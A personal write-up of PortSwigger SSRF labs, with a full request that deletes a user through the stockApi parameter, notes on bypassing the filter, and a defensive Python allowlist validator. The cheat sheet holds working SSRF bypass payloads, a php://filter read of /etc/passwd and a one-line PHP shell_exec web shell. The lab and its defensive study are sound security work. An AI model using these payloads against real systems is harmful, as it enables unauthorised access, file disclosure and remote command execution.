Basic SSRF against the local Server
https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost
When accessing a product page, a "check stock" link checks the stock through an API on a URL that the client supplies in the stockApi parameter. We just need to change that URL to http://localhost/admin, where we can see the user delete links, and here we go with the request that deletes carlos:
POST /product/stock HTTP/1.1
Host: ace01fca1f144b2e80096a4b00aa0058.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ace01fca1f144b2e80096a4b00aa0058.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
DNT: 1
Connection: close
Cookie: session=OQzPe2VCgJ9eEyxVAAO1RsYQYBBqDXj9
Upgrade-Insecure-Requests: 1

stockApi=http%3A%2F%2Flocalhost/admin/delete?username=carlos
Basic SSRF against another backend system

SSRF with blacklist-based input filter
Aha. This one is harder. I'm looking for bypass methodologies and trying a lot of stuff like:
- Encoding the URL with hex, URL, octal, base64
- Trying delimiters: url.domain;other.domain, @, $ etc.
- data://, file://, gopher:// datatypes
All got me HTTP 400 with responses like:
"External stock check blocked for security reasons"
"Invalid external stock check url 'Invalid URL'"
{"error":"Path must start with /"}
OK, I tried to use a domain registered to localhost; this way I could get to 127.0.0.1, but with directory and parameters the filter got me again.

Hah. I've got it... a little char case changing and it finally worked -.-'

I should AGAIN RTFM more... would have been easy if I'd read the challenge description xD
Resources
- https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit#heading=h.kwcnj7jh5zyy
- https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51
Cheat Sheet
dict://
sftp://
ldap:// or ldaps:// or ldapi://
tftp://
gopher://
file:// — Accessing local filesystem
http:// — Accessing HTTP(s) URLs
ftp:// — Accessing FTP(s) URLs
php:// — Accessing various I/O streams
zlib:// — Compression Streams
zip://
data:// — Data (RFC 2397)
glob:// — Find pathnames matching pattern
phar:// — PHP Archive
ssh2:// — Secure Shell 2
rar:// — RAR
expect:// — Process Interaction Streams
";", "/", "?", ":", "@", "=", "&" and "#" DELIMITERS in URI schemes
URI = scheme:[//authority]path[?query][#fragment]
where the authority component divides into three subcomponents: authority = [userinfo@]host[:port]
http://url.domain@evil.domain
data://google.com/plain;base64,SSBsb3ZlIFBIUAo=
data://text/plain;base64,SSBsb3ZlIFBIUAo=google.com
0://evil$google.com
0://evil.com:80,google.com:80/
0://evil.com:80;google.com:80/
php://filter/convert.base64-encode/resource=/etc/passwd
php://input&cmd=ls POST data:
<?php shell_exec($_GET['cmd']); ?>
data://text/plain;base64,MTI3LjAuMC4xL2FkbWluLw===stock.weliketoshop.net
zip://path/to/file.zip%23shell
DNS: POINT YOUR OWN DOMAIN TO 127.0.0.1!!!
alternative IP notations such as 127.1
upper/lower case chars!!
xip.io
nip.io
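What actually stops all of the above (case games, 127.1, a domain of your own pointing at 127.0.0.1, user@host tricks, odd schemes) is not a longer blacklist but an allowlist that parses the URL once, pins scheme, host and port, and checks the address the host resolves to. The following is an added Python example, not code from the lab or from PortSwigger: the allowlisted host stock.weliketoshop.net comes from the payload list above; the allowed ports, the "legitimate" path and the fake DNS table are constructed for the example so it runs offline.

```python
"""Allowlist validation for a server-side 'stockApi' URL parameter.

Added example, not the lab's or PortSwigger's code.  The allowlisted hostname
(stock.weliketoshop.net) is taken from the payload list on the page; the port
set, the sample path and the fake DNS table are constructed for the example.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

# Assumed policy: the stock checker may only talk to one backend, over HTTP(S),
# on the default ports.  Everything else is rejected, whatever it looks like.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"stock.weliketoshop.net"}
ALLOWED_PORTS = {None, 80, 443}

# Constructed DNS table so the example runs offline.  11.22.33.44 is only a
# placeholder public address; a real deployment uses the system resolver.
FAKE_DNS = {"stock.weliketoshop.net": "11.22.33.44"}


def fake_resolve(host: str) -> str:
    """Stand-in for socket.gethostbyname() backed by FAKE_DNS."""
    try:
        return FAKE_DNS[host]
    except KeyError:
        raise socket.gaierror(f"no record for {host}") from None


def naive_blacklist(url: str) -> bool:
    """The string-matching check the lab's filter behaves like.  Returns True
    when the URL is *accepted*.  Kept here only to show what it lets through."""
    return "localhost" not in url and "127.0.0.1" not in url


def is_disallowed_ip(addr: str) -> bool:
    """True for any address the stock checker must never connect to: loopback,
    RFC 1918, link-local, multicast, reserved and the documentation ranges."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        # ipaddress refuses shorthand like 127.1, but inet_aton (and most HTTP
        # clients) expand it to 127.0.0.1; normalise before judging it.
        try:
            ip = ipaddress.ip_address(socket.inet_ntoa(socket.inet_aton(addr)))
        except OSError:
            return True  # cannot reason about it: fail closed
    return not ip.is_global or ip.is_loopback or ip.is_multicast or ip.is_reserved


def check_stock_url(url: str, resolve=socket.gethostbyname) -> tuple[bool, str]:
    """Return (accepted, reason).  Parses the URL once, pins scheme/host/port to
    the allowlist, rejects userinfo, and re-checks the *resolved* address so an
    allowlisted name pointed at 127.0.0.1 is still refused."""
    try:
        parts = urlsplit(url)
        port = parts.port  # raises ValueError on a non-numeric port
    except ValueError as exc:
        return False, f"unparseable URL: {exc}"
    if parts.scheme not in ALLOWED_SCHEMES:  # urlsplit lower-cases the scheme
        return False, f"scheme not allowed: {parts.scheme!r}"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo (user@host) not allowed"
    host = parts.hostname  # lower-cased by urlsplit, so LoCaLhOsT == localhost
    if not host:
        return False, "missing host"
    if host not in ALLOWED_HOSTS:
        return False, f"host not allowed: {host!r}"
    if port not in ALLOWED_PORTS:
        return False, f"port not allowed: {port}"
    try:
        addr = resolve(host)
    except OSError as exc:
        return False, f"resolution failed: {exc}"
    if is_disallowed_ip(addr):
        return False, f"{host} resolves to non-public address {addr}"
    return True, f"ok: {host} -> {addr}"


def demo() -> dict[str, tuple[bool, bool]]:
    """Run the page's payloads through both checks: URL -> (naive, allowlist)."""
    samples = [
        "http://stock.weliketoshop.net/check?productId=1",  # constructed legitimate URL
        "http://localhost/admin/delete?username=carlos",
        "http://LoCaLhOsT/admin",
        "http://127.1/admin",
        "http://url.domain@evil.domain",
        "data://text/plain;base64,MTI3LjAuMC4xL2FkbWluLw===stock.weliketoshop.net",
    ]
    return {u: (naive_blacklist(u), check_stock_url(u, resolve=fake_resolve)[0]) for u in samples}


if __name__ == "__main__":
    for url, (naive, strict) in demo().items():
        print(f"naive={'accept' if naive else 'reject'}  allowlist={'accept' if strict else 'reject'}  {url}")
```

Compare the two columns from demo(): the string blacklist lets LoCaLhOsT and 127.1 straight through, while the allowlist rejects everything except the intended backend, and refuses even that one when its name resolves to 127.0.0.1 (hand check_stock_url a resolver returning "127.0.0.1" to see it). In production, connect to the address you just validated rather than letting the HTTP client resolve the name a second time; otherwise a record that changes between the check and the fetch (DNS rebinding) undoes the whole check.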
Resources
- https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Ben-Sadeghipour-Owning-the-clout-through-SSRF-and-PDF-generators.pdf
- https://github.com/cujanovic/SSRF-Testing
- https://medium.com/@Aptive/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601
- http://webcache.googleusercontent.com/search?q=cache:http://blog.safebuff.com/2016/07/03/SSRF-Tips/